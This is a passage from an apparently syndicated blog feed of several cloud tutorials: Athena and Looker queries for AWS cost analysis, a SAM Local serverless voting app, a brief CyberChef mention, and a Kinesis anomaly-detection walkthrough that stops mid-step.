One thing that’s important to note, is that the Cost and Usage CSVs also contain the column headers in their first row, meaning that the column headers would be included in the dataset and any queries. For testing and quick set-up, you can remove this line manually from your first few CSV files. Long-term, you’ll want to use a script to programmatically remove this row each time a new file is dropped in S3 (every few hours typically). We’ve drafted up a sample script for ease of reference, which we run on Lambda. We utilize Lambda’s native ability to invoke the script whenever a new object is dropped in S3.

For cost and usage, we recommend using the DDL statement below. Since our data is in CSV format, we don’t need to use a SerDe, we can simply specify the “separatorChar, quoteChar, and escapeChar”, and the structure of the files (“TEXTFILE”). Note that AWS does have an OpenCSV SerDe as well, if you prefer to use that.

 

CREATE EXTERNAL TABLE IF NOT EXISTS cost_and_usage	 (
identity_LineItemId String,
identity_TimeInterval String,
bill_InvoiceId String,
bill_BillingEntity String,
bill_BillType String,
bill_PayerAccountId String,
bill_BillingPeriodStartDate String,
bill_BillingPeriodEndDate String,
lineItem_UsageAccountId String,
lineItem_LineItemType String,
lineItem_UsageStartDate String,
lineItem_UsageEndDate String,
lineItem_ProductCode String,
lineItem_UsageType String,
lineItem_Operation String,
lineItem_AvailabilityZone String,
lineItem_ResourceId String,
lineItem_UsageAmount String,
lineItem_NormalizationFactor String,
lineItem_NormalizedUsageAmount String,
lineItem_CurrencyCode String,
lineItem_UnblendedRate String,
lineItem_UnblendedCost String,
lineItem_BlendedRate String,
lineItem_BlendedCost String,
lineItem_LineItemDescription String,
lineItem_TaxType String,
product_ProductName String,
product_accountAssistance String,
product_architecturalReview String,
product_architectureSupport String,
product_availability String,
product_bestPractices String,
product_cacheEngine String,
product_caseSeverityresponseTimes String,
product_clockSpeed String,
product_currentGeneration String,
product_customerServiceAndCommunities String,
product_databaseEdition String,
product_databaseEngine String,
product_dedicatedEbsThroughput String,
product_deploymentOption String,
product_description String,
product_durability String,
product_ebsOptimized String,
product_ecu String,
product_endpointType String,
product_engineCode String,
product_enhancedNetworkingSupported String,
product_executionFrequency String,
product_executionLocation String,
product_feeCode String,
product_feeDescription String,
product_freeQueryTypes String,
product_freeTrial String,
product_frequencyMode String,
product_fromLocation String,
product_fromLocationType String,
product_group String,
product_groupDescription String,
product_includedServices String,
product_instanceFamily String,
product_instanceType String,
product_io String,
product_launchSupport String,
product_licenseModel String,
product_location String,
product_locationType String,
product_maxIopsBurstPerformance String,
product_maxIopsvolume String,
product_maxThroughputvolume String,
product_maxVolumeSize String,
product_maximumStorageVolume String,
product_memory String,
product_messageDeliveryFrequency String,
product_messageDeliveryOrder String,
product_minVolumeSize String,
product_minimumStorageVolume String,
product_networkPerformance String,
product_operatingSystem String,
product_operation String,
product_operationsSupport String,
product_physicalProcessor String,
product_preInstalledSw String,
product_proactiveGuidance String,
product_processorArchitecture String,
product_processorFeatures String,
product_productFamily String,
product_programmaticCaseManagement String,
product_provisioned String,
product_queueType String,
product_requestDescription String,
product_requestType String,
product_routingTarget String,
product_routingType String,
product_servicecode String,
product_sku String,
product_softwareType String,
product_storage String,
product_storageClass String,
product_storageMedia String,
product_technicalSupport String,
product_tenancy String,
product_thirdpartySoftwareSupport String,
product_toLocation String,
product_toLocationType String,
product_training String,
product_transferType String,
product_usageFamily String,
product_usagetype String,
product_vcpu String,
product_version String,
product_volumeType String,
product_whoCanOpenCases String,
pricing_LeaseContractLength String,
pricing_OfferingClass String,
pricing_PurchaseOption String,
pricing_publicOnDemandCost String,
pricing_publicOnDemandRate String,
pricing_term String,
pricing_unit String,
reservation_AvailabilityZone String,
reservation_NormalizedUnitsPerReservation String,
reservation_NumberOfReservations String,
reservation_ReservationARN String,
reservation_TotalReservedNormalizedUnits String,
reservation_TotalReservedUnits String,
reservation_UnitsPerReservation String,
resourceTags_userName String,
resourceTags_usercostcategory String  


)
    ROW FORMAT DELIMITED
      FIELDS TERMINATED BY ','
      ESCAPED BY '\\'
      LINES TERMINATED BY '\n'

STORED AS TEXTFILE
    LOCATION 's3://<<your bucket name>>';

Once you’ve successfully executed the command, you should see a new table named “cost_and_usage” with the below properties. Now we’re ready to start executing queries and running analysis!

Start with Looker and connect to Athena

Setting up Looker is a quick process, and you can try it out for free here (or download from Amazon Marketplace). It takes just a few seconds to connect Looker to your Athena database, and Looker comes with a host of pre-built data models and dashboards to make analysis of your cost and usage data simple and intuitive. After you’re connected, you can use the Looker UI to run whatever analysis you’d like. Looker translates this UI to optimized SQL, so any user can execute and visualize queries for true self-service analytics.

Major cost saving levers

Now that the data pipeline is configured, you can dive into the most popular use cases for cost savings. In this post, I focus on:

  • Purchasing Reserved Instances vs. On-Demand Instances
  • Data transfer costs
  • Allocating costs over users or other Attributes (denoted with resource tags)

On-Demand, Spot, and Reserved Instances

Purchasing Reserved Instances vs On-Demand Instances is arguably going to be the biggest cost lever for heavy AWS users (Reserved Instances run up to 75% cheaper!). AWS offers three options for purchasing instances:

  • On-Demand—Pay as you use.
  • Spot (variable cost)—Bid on spare Amazon EC2 computing capacity.
  • Reserved Instances—Pay for an instance for a specific, allotted period of time.

When purchasing a Reserved Instance, you can also choose to pay all-upfront, partial-upfront, or monthly. The more you pay upfront, the greater the discount.

If your company has been using AWS for some time now, you should have a good sense of your overall instance usage on a per-month or per-day basis. Rather than paying for these instances On-Demand, you should try to forecast the number of instances you’ll need, and reserve them with upfront payments.

The total amount of usage with Reserved Instances versus overall usage with all instances is called your coverage ratio. It’s important not to confuse your coverage ratio with your Reserved Instance utilization. Utilization represents the amount of reserved hours that were actually used. Don’t worry about exceeding capacity, you can still set up Auto Scaling preferences so that more instances get added whenever your coverage or utilization crosses a certain threshold (we often see a target of 80% for both coverage and utilization among savvy customers).

Calculating the reserved costs and coverage can be a bit tricky with the level of granularity provided by the cost and usage report. The following query shows your total cost over the last 6 months, broken out by Reserved Instance vs other instance usage. You can substitute the cost field for usage if you’d prefer. Please note that you should only have data for the time period after the cost and usage report has been enabled (though you can opt for up to 3 months of historical data by contacting your AWS Account Executive). If you’re just getting started, this query will only show a few days.

 

SELECT 
	DATE_FORMAT(from_iso8601_timestamp(cost_and_usage.lineitem_usagestartdate),'%Y-%m') AS "cost_and_usage.usage_start_month",
	COALESCE(SUM(cost_and_usage.lineitem_unblendedcost ), 0) AS "cost_and_usage.total_unblended_cost",
	COALESCE(SUM(CASE WHEN (CASE
         WHEN cost_and_usage.lineitem_lineitemtype = 'DiscountedUsage' THEN 'RI Line Item'
         WHEN cost_and_usage.lineitem_lineitemtype = 'RIFee' THEN 'RI Line Item'
         WHEN cost_and_usage.lineitem_lineitemtype = 'Fee' THEN 'RI Line Item'
         ELSE 'Non RI Line Item'
        END = 'RI Line Item') THEN cost_and_usage.lineitem_unblendedcost  ELSE NULL END), 0) AS "cost_and_usage.total_reserved_unblended_cost",
	1.0 * (COALESCE(SUM(CASE WHEN (CASE
         WHEN cost_and_usage.lineitem_lineitemtype = 'DiscountedUsage' THEN 'RI Line Item'
         WHEN cost_and_usage.lineitem_lineitemtype = 'RIFee' THEN 'RI Line Item'
         WHEN cost_and_usage.lineitem_lineitemtype = 'Fee' THEN 'RI Line Item'
         ELSE 'Non RI Line Item'
        END = 'RI Line Item') THEN cost_and_usage.lineitem_unblendedcost  ELSE NULL END), 0)) / NULLIF((COALESCE(SUM(cost_and_usage.lineitem_unblendedcost ), 0)),0)  AS "cost_and_usage.percent_spend_on_ris",
	COALESCE(SUM(CASE WHEN (CASE
         WHEN cost_and_usage.lineitem_lineitemtype = 'DiscountedUsage' THEN 'RI Line Item'
         WHEN cost_and_usage.lineitem_lineitemtype = 'RIFee' THEN 'RI Line Item'
         WHEN cost_and_usage.lineitem_lineitemtype = 'Fee' THEN 'RI Line Item'
         ELSE 'Non RI Line Item'
        END = 'Non RI Line Item') THEN cost_and_usage.lineitem_unblendedcost  ELSE NULL END), 0) AS "cost_and_usage.total_non_reserved_unblended_cost",
	1.0 * (COALESCE(SUM(CASE WHEN (CASE
         WHEN cost_and_usage.lineitem_lineitemtype = 'DiscountedUsage' THEN 'RI Line Item'
         WHEN cost_and_usage.lineitem_lineitemtype = 'RIFee' THEN 'RI Line Item'
         WHEN cost_and_usage.lineitem_lineitemtype = 'Fee' THEN 'RI Line Item'
         ELSE 'Non RI Line Item'
        END = 'Non RI Line Item') THEN cost_and_usage.lineitem_unblendedcost  ELSE NULL END), 0)) / NULLIF((COALESCE(SUM(cost_and_usage.lineitem_unblendedcost ), 0)),0)  AS "cost_and_usage.percent_spend_on_non_ris"
FROM aws_optimizer.cost_and_usage  AS cost_and_usage

WHERE 
	(((from_iso8601_timestamp(cost_and_usage.lineitem_usagestartdate)) >= ((DATE_ADD('month', -5, DATE_TRUNC('MONTH', CAST(NOW() AS DATE))))) AND (from_iso8601_timestamp(cost_and_usage.lineitem_usagestartdate)) < ((DATE_ADD('month', 6, DATE_ADD('month', -5, DATE_TRUNC('MONTH', CAST(NOW() AS DATE))))))))
GROUP BY 1
ORDER BY 2 DESC
LIMIT 500

The resulting table should look something like the image below (I’m surfacing tables through Looker, though the same table would result from querying via command line or any other interface).

With a BI tool, you can create dashboards for easy reference and monitoring. New data is dumped into S3 every few hours, so your dashboards can update several times per day.

It’s an iterative process to understand the appropriate number of Reserved Instances needed to meet your business needs. After you’ve properly integrated Reserved Instances into your purchasing patterns, the savings can be significant. If your coverage is consistently below 70%, you should seriously consider adjusting your purchase types and opting for more Reserved instances.

Data transfer costs

One of the great things about AWS data storage is that it’s incredibly cheap. Most charges often come from moving and processing that data. There are several different prices for transferring data, broken out largely by transfers between regions and availability zones. Transfers between regions are the most costly, followed by transfers between Availability Zones. Transfers within the same region and same availability zone are free unless using elastic or public IP addresses, in which case there is a cost. You can find more detailed information in the AWS Pricing Docs. With this in mind, there are several simple strategies for helping reduce costs.

First, since costs increase when transferring data between regions, it’s wise to ensure that as many services as possible reside within the same region. The more you can localize services to one specific region, the lower your costs will be.

Second, you should maximize the data you’re routing directly within AWS services and IP addresses. Transfers out to the open internet are the most costly and least performant mechanisms of data transfers, so it’s best to keep transfers within AWS services.

Lastly, data transfers between private IP addresses are cheaper than between elastic or public IP addresses, so utilizing private IP addresses as much as possible is the most cost-effective strategy.

The following query provides a table depicting the total costs for each AWS product, broken out transfer cost type. Substitute the “lineitem_productcode” field in the query to segment the costs by any other attribute. If you notice any unusually high spikes in cost, you’ll need to dig deeper to understand what’s driving that spike: location, volume, and so on. Drill down into specific costs by including “product_usagetype” and “product_transfertype” in your query to identify the types of transfer costs that are driving up your bill.

SELECT 
	cost_and_usage.lineitem_productcode  AS "cost_and_usage.product_code",
	COALESCE(SUM(cost_and_usage.lineitem_unblendedcost), 0) AS "cost_and_usage.total_unblended_cost",
	COALESCE(SUM(CASE WHEN REGEXP_LIKE(cost_and_usage.product_usagetype, 'DataTransfer')    THEN cost_and_usage.lineitem_unblendedcost  ELSE NULL END), 0) AS "cost_and_usage.total_data_transfer_cost",
	COALESCE(SUM(CASE WHEN REGEXP_LIKE(cost_and_usage.product_usagetype, 'DataTransfer-In')    THEN cost_and_usage.lineitem_unblendedcost  ELSE NULL END), 0) AS "cost_and_usage.total_inbound_data_transfer_cost",
	COALESCE(SUM(CASE WHEN REGEXP_LIKE(cost_and_usage.product_usagetype, 'DataTransfer-Out')    THEN cost_and_usage.lineitem_unblendedcost  ELSE NULL END), 0) AS "cost_and_usage.total_outbound_data_transfer_cost"
FROM aws_optimizer.cost_and_usage  AS cost_and_usage

WHERE 
	(((from_iso8601_timestamp(cost_and_usage.lineitem_usagestartdate)) >= ((DATE_ADD('month', -5, DATE_TRUNC('MONTH', CAST(NOW() AS DATE))))) AND (from_iso8601_timestamp(cost_and_usage.lineitem_usagestartdate)) < ((DATE_ADD('month', 6, DATE_ADD('month', -5, DATE_TRUNC('MONTH', CAST(NOW() AS DATE))))))))
GROUP BY 1
ORDER BY 2 DESC
LIMIT 500

When moving between regions or over the open web, many data transfer costs also include the origin and destination location of the data movement. Using a BI tool with mapping capabilities, you can get a nice visual of data flows. The point at the center of the map is used to represent external data flows over the open internet.

Analysis by tags

AWS provides the option to apply custom tags to individual resources, so you can allocate costs over whatever customized segment makes the most sense for your business. For a SaaS company that hosts software for customers on AWS, maybe you’d want to tag the size of each customer. The following query uses custom tags to display the reserved, data transfer, and total cost for each AWS service, broken out by tag categories, over the last 6 months. You’ll want to substitute the cost_and_usage.resourcetags_customersegment and cost_and_usage.customer_segment with the name of your customer field.

 

SELECT * FROM (
SELECT *, DENSE_RANK() OVER (ORDER BY z___min_rank) as z___pivot_row_rank, RANK() OVER (PARTITION BY z__pivot_col_rank ORDER BY z___min_rank) as z__pivot_col_ordering FROM (
SELECT *, MIN(z___rank) OVER (PARTITION BY "cost_and_usage.product_code") as z___min_rank FROM (
SELECT *, RANK() OVER (ORDER BY CASE WHEN z__pivot_col_rank=1 THEN (CASE WHEN "cost_and_usage.total_unblended_cost" IS NOT NULL THEN 0 ELSE 1 END) ELSE 2 END, CASE WHEN z__pivot_col_rank=1 THEN "cost_and_usage.total_unblended_cost" ELSE NULL END DESC, "cost_and_usage.total_unblended_cost" DESC, z__pivot_col_rank, "cost_and_usage.product_code") AS z___rank FROM (
SELECT *, DENSE_RANK() OVER (ORDER BY CASE WHEN "cost_and_usage.customer_segment" IS NULL THEN 1 ELSE 0 END, "cost_and_usage.customer_segment") AS z__pivot_col_rank FROM (
SELECT 
	cost_and_usage.lineitem_productcode  AS "cost_and_usage.product_code",
	cost_and_usage.resourcetags_customersegment  AS "cost_and_usage.customer_segment",
	COALESCE(SUM(cost_and_usage.lineitem_unblendedcost ), 0) AS "cost_and_usage.total_unblended_cost",
	1.0 * (COALESCE(SUM(CASE WHEN REGEXP_LIKE(cost_and_usage.product_usagetype, 'DataTransfer')    THEN cost_and_usage.lineitem_unblendedcost  ELSE NULL END), 0)) / NULLIF((COALESCE(SUM(cost_and_usage.lineitem_unblendedcost ), 0)),0)  AS "cost_and_usage.percent_spend_data_transfers_unblended",
	1.0 * (COALESCE(SUM(CASE WHEN (CASE
         WHEN cost_and_usage.lineitem_lineitemtype = 'DiscountedUsage' THEN 'RI Line Item'
         WHEN cost_and_usage.lineitem_lineitemtype = 'RIFee' THEN 'RI Line Item'
         WHEN cost_and_usage.lineitem_lineitemtype = 'Fee' THEN 'RI Line Item'
         ELSE 'Non RI Line Item'
        END = 'Non RI Line Item') THEN cost_and_usage.lineitem_unblendedcost  ELSE NULL END), 0)) / NULLIF((COALESCE(SUM(cost_and_usage.lineitem_unblendedcost ), 0)),0)  AS "cost_and_usage.unblended_percent_spend_on_ris"
FROM aws_optimizer.cost_and_usage_raw  AS cost_and_usage

WHERE 
	(((from_iso8601_timestamp(cost_and_usage.lineitem_usagestartdate)) >= ((DATE_ADD('month', -5, DATE_TRUNC('MONTH', CAST(NOW() AS DATE))))) AND (from_iso8601_timestamp(cost_and_usage.lineitem_usagestartdate)) < ((DATE_ADD('month', 6, DATE_ADD('month', -5, DATE_TRUNC('MONTH', CAST(NOW() AS DATE))))))))
GROUP BY 1,2) ww
) bb WHERE z__pivot_col_rank <= 16384
) aa
) xx
) zz
 WHERE z___pivot_row_rank <= 500 OR z__pivot_col_ordering = 1 ORDER BY z___pivot_row_rank

The resulting table in this example looks like the results below. In this example, you can tell that we’re making poor use of Reserved Instances because they represent such a small portion of our overall costs.

Again, using a BI tool to visualize these costs and trends over time makes the analysis much easier to consume and take action on.

Summary

Saving costs on your AWS spend is always an iterative, ongoing process. Hopefully with these queries alone, you can start to understand your spending patterns and identify opportunities for savings. However, this is just a peek into the many opportunities available through analysis of the Cost and Usage report. Each company is different, with unique needs and usage patterns. To achieve maximum cost savings, we encourage you to set up an analytics environment that enables your team to explore all potential cuts and slices of your usage data, whenever it’s necessary. Exploring different trends and spikes across regions, services, user types, etc. helps you gain comprehensive understanding of your major cost levers and consistently implement new cost reduction strategies.

Note that all of the queries and analysis provided in this post were generated using the Looker data platform. If you’re already a Looker customer, you can get all of this analysis, additional pre-configured dashboards, and much more using Looker Blocks for AWS.


About the Author

Dillon Morrison leads the Platform Ecosystem at Looker. He enjoys exploring new technologies and architecting the most efficient data solutions for the business needs of his company and their customers. In his spare time, you’ll find Dillon rock climbing in the Bay Area or nose deep in the docs of the latest AWS product release at his favorite cafe (“Arlequin in SF is unbeatable!”).

 

 

 

New – AWS SAM Local (Beta) – Build and Test Serverless Applications Locally

Post Syndicated from Randall Hunt original https://aws.amazon.com/blogs/aws/new-aws-sam-local-beta-build-and-test-serverless-applications-locally/

Today we’re releasing a beta of a new tool, SAM Local, that makes it easy to build and test your serverless applications locally. In this post we’ll use SAM local to build, debug, and deploy a quick application that allows us to vote on tabs or spaces by curling an endpoint. AWS introduced Serverless Application Model (SAM) last year to make it easier for developers to deploy serverless applications. If you’re not already familiar with SAM my colleague Orr wrote a great post on how to use SAM that you can read in about 5 minutes. At it’s core, SAM is a powerful open source specification built on AWS CloudFormation that makes it easy to keep your serverless infrastructure as code – and they have the cutest mascot.

SAM Local takes all the good parts of SAM and brings them to your local machine.

There are a couple of ways to install SAM Local but the easiest is through NPM. A quick npm install -g aws-sam-local should get us going but if you want the latest version you can always install straight from the source: go get github.com/awslabs/aws-sam-local (this will create a binary named aws-sam-local, not sam).

I like to vote on things so let’s write a quick SAM application to vote on Spaces versus Tabs. We’ll use a very simple, but powerful, architecture of API Gateway fronting a Lambda function and we’ll store our results in DynamoDB. In the end a user should be able to curl our API curl https://SOMEURL/ -d '{"vote": "spaces"}' and get back the number of votes.

Let’s start by writing a simple SAM template.yaml:

AWSTemplateFormatVersion : '2010-09-09'
Transform: AWS::Serverless-2016-10-31
Resources:
  VotesTable:
    Type: "AWS::Serverless::SimpleTable"
  VoteSpacesTabs:
    Type: "AWS::Serverless::Function"
    Properties:
      Runtime: python3.6
      Handler: lambda_function.lambda_handler
      Policies: AmazonDynamoDBFullAccess
      Environment:
        Variables:
          TABLE_NAME: !Ref VotesTable
      Events:
        Vote:
          Type: Api
          Properties:
            Path: /
            Method: post

So we create a [dynamo_i] table that we expose to our Lambda function through an environment variable called TABLE_NAME.

To test that this template is valid I’ll go ahead and call sam validate to make sure I haven’t fat-fingered anything. It returns Valid! so let’s go ahead and get to work on our Lambda function.

import os
import os
import json
import boto3
votes_table = boto3.resource('dynamodb').Table(os.getenv('TABLE_NAME'))

def lambda_handler(event, context):
    print(event)
    if event['httpMethod'] == 'GET':
        resp = votes_table.scan()
        return {'body': json.dumps({item['id']: int(item['votes']) for item in resp['Items']})}
    elif event['httpMethod'] == 'POST':
        try:
            body = json.loads(event['body'])
        except:
            return {'statusCode': 400, 'body': 'malformed json input'}
        if 'vote' not in body:
            return {'statusCode': 400, 'body': 'missing vote in request body'}
        if body['vote'] not in ['spaces', 'tabs']:
            return {'statusCode': 400, 'body': 'vote value must be "spaces" or "tabs"'}

        resp = votes_table.update_item(
            Key={'id': body['vote']},
            UpdateExpression='ADD votes :incr',
            ExpressionAttributeValues={':incr': 1},
            ReturnValues='ALL_NEW'
        )
        return {'body': "{} now has {} votes".format(body['vote'], resp['Attributes']['votes'])}

So let’s test this locally. I’ll need to create a real DynamoDB database to talk to and I’ll need to provide the name of that database through the enviornment variable TABLE_NAME. I could do that with an env.json file or I can just pass it on the command line. First, I can call:
$ echo '{"httpMethod": "POST", "body": "{\"vote\": \"spaces\"}"}' |\
TABLE_NAME="vote-spaces-tabs" sam local invoke "VoteSpacesTabs"

to test the Lambda – it returns the number of votes for spaces so theoritically everything is working. Typing all of that out is a pain so I could generate a sample event with sam local generate-event api and pass that in to the local invocation. Far easier than all of that is just running our API locally. Let’s do that: sam local start-api. Now I can curl my local endpoints to test everything out.
I’ll run the command: $ curl -d '{"vote": "tabs"}' http://127.0.0.1:3000/ and it returns: “tabs now has 12 votes”. Now, of course I did not write this function perfectly on my first try. I edited and saved several times. One of the benefits of hot-reloading is that as I change the function I don’t have to do any additional work to test the new function. This makes iterative development vastly easier.

Let’s say we don’t want to deal with accessing a real DynamoDB database over the network though. What are our options? Well we can download DynamoDB Local and launch it with java -Djava.library.path=./DynamoDBLocal_lib -jar DynamoDBLocal.jar -sharedDb. Then we can have our Lambda function use the AWS_SAM_LOCAL environment variable to make some decisions about how to behave. Let’s modify our function a bit:

import os
import json
import boto3
if os.getenv("AWS_SAM_LOCAL"):
    votes_table = boto3.resource(
        'dynamodb',
        endpoint_url="http://docker.for.mac.localhost:8000/"
    ).Table("spaces-tabs-votes")
else:
    votes_table = boto3.resource('dynamodb').Table(os.getenv('TABLE_NAME'))

Now we’re using a local endpoint to connect to our local database which makes working without wifi a little easier.

SAM local even supports interactive debugging! In Java and Node.js I can just pass the -d flag and a port to immediately enable the debugger. For Python I could use a library like import epdb; epdb.serve() and connect that way. Then we can call sam local invoke -d 8080 "VoteSpacesTabs" and our function will pause execution waiting for you to step through with the debugger.

Alright, I think we’ve got everything working so let’s deploy this!

First I’ll call the sam package command which is just an alias for aws cloudformation package and then I’ll use the result of that command to sam deploy.

$ sam package --template-file template.yaml --s3-bucket MYAWESOMEBUCKET --output-template-file package.yaml
Uploading to 144e47a4a08f8338faae894afe7563c3  90570 / 90570.0  (100.00%)
Successfully packaged artifacts and wrote output template to file package.yaml.
Execute the following command to deploy the packaged template
aws cloudformation deploy --template-file package.yaml --stack-name 
$ sam deploy --template-file package.yaml --stack-name VoteForSpaces --capabilities CAPABILITY_IAM
Waiting for changeset to be created..
Waiting for stack create/update to complete
Successfully created/updated stack - VoteForSpaces

Which brings us to our API:
.

I’m going to hop over into the production stage and add some rate limiting in case you guys start voting a lot – but otherwise we’ve taken our local work and deployed it to the cloud without much effort at all. I always enjoy it when things work on the first deploy!

You can vote now and watch the results live! http://spaces-or-tabs.s3-website-us-east-1.amazonaws.com/

We hope that SAM Local makes it easier for you to test, debug, and deploy your serverless apps. We have a CONTRIBUTING.md guide and we welcome pull requests. Please tweet at us to let us know what cool things you build. You can see our What’s New post here and the documentation is live here.

Randall

CyberChef – Cyber Swiss Army Knife

Post Syndicated from Darknet original http://feedproxy.google.com/~r/darknethackers/~3/SOhld_nebGs/

CyberChef is a simple, intuitive web app for carrying out all manner of “cyber” operations within a web browser. These operations include simple encoding like XOR or Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509…

Read the full post at darknet.org.uk

Perform Near Real-time Analytics on Streaming Data with Amazon Kinesis and Amazon Elasticsearch Service

Post Syndicated from Tristan Li original https://aws.amazon.com/blogs/big-data/perform-near-real-time-analytics-on-streaming-data-with-amazon-kinesis-and-amazon-elasticsearch-service/

Nowadays, streaming data is seen and used everywhere—from social networks, to mobile and web applications, IoT devices, instrumentation in data centers, and many other sources. As the speed and volume of this type of data increases, the need to perform data analysis in real time with machine learning algorithms and extract a deeper understanding from the data becomes ever more important. For example, you might want a continuous monitoring system to detect sentiment changes in a social media feed so that you can react to the sentiment in near real time.

In this post, we use Amazon Kinesis Streams to collect and store streaming data. We then use Amazon Kinesis Analytics to process and analyze the streaming data continuously. Specifically, we use the Kinesis Analytics built-in RANDOM_CUT_FOREST function, a machine learning algorithm, to detect anomalies in the streaming data. Finally, we use Amazon Kinesis Firehose to export the anomalies data to Amazon Elasticsearch Service (Amazon ES). We then build a simple dashboard in the open source tool Kibana to visualize the result.

Solution overview

The following diagram depicts a high-level overview of this solution.

Amazon Kinesis Streams

You can use Amazon Kinesis Streams to build your own streaming application. This application can process and analyze streaming data by continuously capturing and storing terabytes of data per hour from hundreds of thousands of sources.

Amazon Kinesis Analytics

Kinesis Analytics provides an easy and familiar standard SQL language to analyze streaming data in real time. One of its most powerful features is that there are no new languages, processing frameworks, or complex machine learning algorithms that you need to learn.

Amazon Kinesis Firehose

Kinesis Firehose is the easiest way to load streaming data into AWS. It can capture, transform, and load streaming data into Amazon S3, Amazon Redshift, and Amazon Elasticsearch Service.

Amazon Elasticsearch Service

Amazon ES is a fully managed service that makes it easy to deploy, operate, and scale Elasticsearch for log analytics, full text search, application monitoring, and more.

Solution summary

The following is a quick walkthrough of the solution that’s presented in the diagram:

  1. IoT sensors send streaming data into Kinesis Streams. In this post, you use a Python script to simulate an IoT temperature sensor device that sends the streaming data.
  2. By using the built-in RANDOM_CUT_FOREST function in Kinesis Analytics, you can detect anomalies in real time with the sensor data that is stored in Kinesis Streams. RANDOM_CUT_FOREST is also an appropriate algorithm for many other kinds of anomaly-detection use cases—for example, the media sentiment example mentioned earlier in this post.
  3. The processed anomaly data is then loaded into the Kinesis Firehose delivery stream.
  4. By using the built-in integration that Kinesis Firehose has with Amazon ES, you can easily export the processed anomaly data into the service and visualize it with Kibana.

Implementation steps

The following sections walk through the implementation steps in detail.

Creating the delivery stream

  1. Open the Amazon Kinesis Streams console.
  2. Create a new Kinesis stream. Give it a name that indicates it’s for raw incoming stream data—for example, RawStreamData. For Number of shards, type 1.
  3. The Python code provided below simulates a streaming application, such as an IoT device, and generates random data and anomalies into a Kinesis stream. The code generates two temperature ranges, where the first range is the hypothetical sensor’s normal operating temperature range (10–20), and the second is the anomaly temperature range (100–120).Make sure to change the stream name on line 16 and 20 and the Region on line 6 to match your configuration. Alternatively, you can download the Amazon Kinesis Data Generator from this repository and use it to generate the data.
    import json
    import datetime
    import random
    import testdata
    from boto import kinesis
    
    kinesis = kinesis.connect_to_region("us-east-1")
    
    def getData(iotName, lowVal, highVal):
       data = {}
       data["iotName"] = iotName
       data["iotValue"] = random.randint(lowVal, highVal) 
       return data
    
    while 1:
       rnd = random.random()
       if (rnd < 0.01):
          data = json.dumps(getData("DemoSensor", 100, 120))  
          kinesis.put_record("RawStreamData", data, "DemoSensor")
          print '***************************** anomaly ************************* ' + data
       else:
          data = json.dumps(getData("DemoSensor", 10, 20))  
          kinesis.put_record("RawStreamData", data, "DemoSensor")
          print data

  4. Open the Amazon Elasticsearch Service console and create a new domain.
    1. Give the domain a unique name. In the Configure cluster screen, use the default settings.
    2. In the Set up access policy screen, in the Set the domain access policy list, choose Allow access to the domain from specific IP(s).
    3. Enter the public IP address of your computer.
      Note: If you’re working behind a proxy or firewall, see the “Use a proxy to simplify request signing” section in this AWS Database blog post to learn how to work with a proxy. For additional information about securing access to your Amazon ES domain, see How to Control Access to Your Amazon Elasticsearch Domain in the AWS Security Blog.
  5. After the Amazon ES domain is up and running, you can set up and configure Kinesis Firehose to export results to Amazon ES:
    1. Open the Amazon Kinesis Firehose console and choose Create Delivery Stream.
    2. In the Destination dropdown list, choose Amazon Elasticsearch Service.
    3. Type a stream name, and choose the Amazon ES domain that you created in Step 4.
    4. Provide an index name and ES type. In the S3 bucket dropdown list, choose Create New S3 bucket. Choose Next.
    5. In the configuration, change the Elasticsearch Buffer size to 1 MB and the Buffer interval to 60s. Use the default settings for all other fields. This shortens the time for the data to reach the ES cluster.
    6. Under IAM Role, choose Create/Update existing IAM role.
      The best practice is to create a new role every time. Otherwise, the console keeps adding policy documents to the same role. Eventually the size of the attached policies causes IAM to reject the role, but it does it in a non-obvious way, where the console basically quits functioning.
    7. Choose Next to move to the Review page.
  6. Review the configuration, and then choose Create Delivery Stream.
  7. Run the Python file for 1–2 minutes, and then press Ctrl+C to stop the execution. This loads some data into the stream for you to visualize in the next step.

Analyzing the data

Now it’s time to analyze the IoT streaming data using Amazon Kinesis Analytics.

  1. Open the Amazon Kinesis Analytics console and create a new application. Give the application a name, and then choose Create Application.
  2. On the next screen, choose Connect to a source. Choose the raw incoming data stream that you created earlier. (Note the stream name Source_SQL_STREAM_001 because you will need it later.)
  3. Use the default settings for everything else. When the schema discovery process is complete, it displays a success message with the formatted stream sample in a table as shown in the following screenshot. Review the data, and then choose Save and continue.
  4. Next, choose Go to SQL editor. When prompted, choose Yes, start application.
  5. Copy the following SQL code and paste it into the SQL editor window.
    CREATE OR REPLACE STREAM "TEMP_STREAM" (
       "iotName"        varchar (40),
       "iotValue"   integer,
       "ANOMALY_SCORE"  DOUBLE);
    -- Creates an output stream and defines a schema
    CREATE OR REPLACE STREAM "DESTINATION_SQL_STREAM" (
       "iotName"       varchar(40),
       "iotValue"       integer,
       "ANOMALY_SCORE"  DOUBLE,
       "created" TimeStamp);
     
    -- Compute an anomaly score for each record in the source stream
    -- using Random Cut Forest
    CREATE OR REPLACE PUMP "STREAM_PUMP_1" AS INSERT INTO "TEMP_STREAM"
    SELECT STREAM "iotName", "iotValue", ANOMALY_SCORE FROM
      TABLE(RANDOM_CUT_FOREST(
        CURSOR(SELECT STREAM * FROM "SOURCE_SQL_STREAM_001")
      )
    );
    
    -- Sort records by descending anomaly score, insert into output stream
    CREATE OR REPLACE PUMP "OUTPUT_PUMP" AS INSERT INTO "DESTINATION_SQL_STREAM"
    SELECT STREAM "iotName", "iotValue", ANOMALY_SCORE, ROWTIME FROM "TEMP_STREAM"
    ORDER BY FLOOR("TEMP_STREAM".ROWTIME TO SECOND), ANOMALY_SCORE DESC;

 

  1. Choose Save and run SQL.
    As the application is running, it displays the results as stream data arrives. If you don’t see any data coming in, run the Python script again to generate some fresh data. When there is data, it appears in a grid as shown in the following screenshot.Note that you are selecting data from the source stream name Source_SQL_STREAM_001 that you created previously. Also note the ANOMALY_SCORE column. This is the value that the Random_Cut_Forest function calculates based on the temperature ranges provided by the Python script. Higher (anomaly) temperature ranges have a higher score.Looking at the SQL code, note that the first two blocks of code create two new streams to store temporary data and the final result. The third block of code analyzes the raw source data (Stream_Pump_1) using the Random_Cut_Forest function. It calculates an anomaly score (ANOMALY_SCORE) and inserts it into the TEMP_STREAM stream. The final code block loads the result stored in the TEMP_STREAM into DESTINATION_SQL_STREAM.
  2. Choose Exit (done editing) next to the Save and run SQL button to return to the application configuration page.

Load processed data into the Kinesis Firehose delivery stream

Now, you can export the result from DESTINATION_SQL_STREAM into the Amazon Kinesis Firehose stream that you created previously.

  1. On the application configuration page, choose Connect to a destination.
